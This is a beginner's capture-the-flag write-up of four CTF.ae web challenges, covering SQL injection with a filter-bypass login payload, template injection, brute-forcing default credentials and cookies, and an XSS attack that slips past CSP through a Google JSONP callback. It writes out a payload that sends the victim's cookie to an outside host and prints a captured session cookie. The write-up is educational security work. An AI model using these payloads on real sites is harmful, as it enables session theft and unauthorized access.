CAT CTF.ae-Write-up

Hi , My name is Ahmed Magdy :)

I would like to thank all the organizers for this CTF

and my new team

Let’s go solving the web challenge…

1 - Challenge Name : Admin Panel

Admin Panel

When i check the sourse code i find the user and pass = Guest_101 there in a HTML comment

user and pass = Guest_101

Welcome Guest!

cookies

After a long time add the cookie, I couldn’t find anything :(

i will try SQL injection if anything happens

i will try SQL injection

when i will try SQL injection it is alert (Forbidden)

alert (Forbidden)

it is SQL injection

It is filter to any payload Includes (or)

I try some payload and it is payload is work >> Guest_101'/*//*/’1'=’

log is with SQL injection

user and password >> Guest_101'/*//*/’1'=’

alert Includes flag

Flag : CTFAE{SQLi_1s_C00l_Vulnerability_Th0ugh_Sp3cially_1n_CTFAE}

2 - Challenge Name : Greeting Generator

Greeting Generator

I found three input filed and i try command injection but the command was print. let’s try Server Side Template Injection

command injection

The resulting for command injection

command injection

The resulting for new command injection

The template engine is probably Jinja2, but you have to face some restrictions.

When i find what happen i remember the writ-up >> Abdalla Tarek

but different flag

Flag : CTFAE{HelloThereGeneralKenobi}

3 - Challenge Name : Sorry Wilson

Sorry Wilson

I will try in user and password= admin or any thing i find

Unknown username and password

When i check the sourse code i find the HTML comment

after dirb i find the >> ( generated_users.txt ) and ( .DS_Store ) and (README.md)

README.md

open generated_users.txt i find the all user for ( team forest ) and i try brute force in user and i have default password = P@ssw0rd!

user: forest.jenny :: password: P@ssw0rd!

I check in case i find the cookies

I find this cookies

once logged in brute force the uid=cookies from same file

uid=f.captin

uid=f.captin

Flag : CTFAE{D0_nOt_Cr347E_CLE4r_M3sSag3}

4 - Challenge Name : Support Ticket 2.0

Support Ticket 2.0

I will try xss payload

xss payload

xss payload is work

CSP Evaluater

CSP (Content Security Policy) is an HTTP header that a web application can send to inform the browser what are the trusted sources to load and execute java script from. Let’s examine the CSP policy sent by the server

the trusted sources to load and execute java script

We can use an online tool by google called CSP Evaluator and paste the CSP policy into it to check for any vulnerabilities.

For more on bypassing CSP using angular, read this blog here.

the trusted sources to load and execute java script from i used >>

”><script src=”https://accounts.google.com/o/oauth2/revoke?callback=alert(document.cookie)"></script>

It works! So now let’s craft a payload to exfiltrate the cookie and see if there’s anything interesting. I will be using a payload that sends the cookie HTTP request to a URL: https://Ahmed.free.beeceptor.com

<script src=”//accounts.google.com/o/oauth2/revoke?callback=eval(document.location=’https://Ahmed.free.beeceptor.com'.concat(document.cookie))"></script>

cookie=session=s%3A6PZYod9n7ENwZ7iDudPtgBkEd6MJstV8.WyFSMUj13Kf6j3Fnk8mIk1MN%2FLhaElmE%2FN16Q%2FPJhH4

the cookie changed whit all request

and his referer >> http://web.ctf.ae:8812/support_ticket/f1400c65-ea9f-48db-9394-0fda02b690db?displayFlag=false

when use the referer :(

403 — Permission denied. Not admin!

so use the referer and cookies for admin and add parameter displayFlag=false to displayFlag=true

Flag : CTFAE{JSONAreTheBestTypeOfBees}

End the web challenge…… I solve it :)

I would like to thank my new team for help my to solve challenges

I would like to thank my new team for help my to solve challenges

Think you for your time :)

I would like to thank all the organizers for this CTF again:)

And finally, Thank you to read this write-up :)

Contact me if you want : Ahmed Magdy :)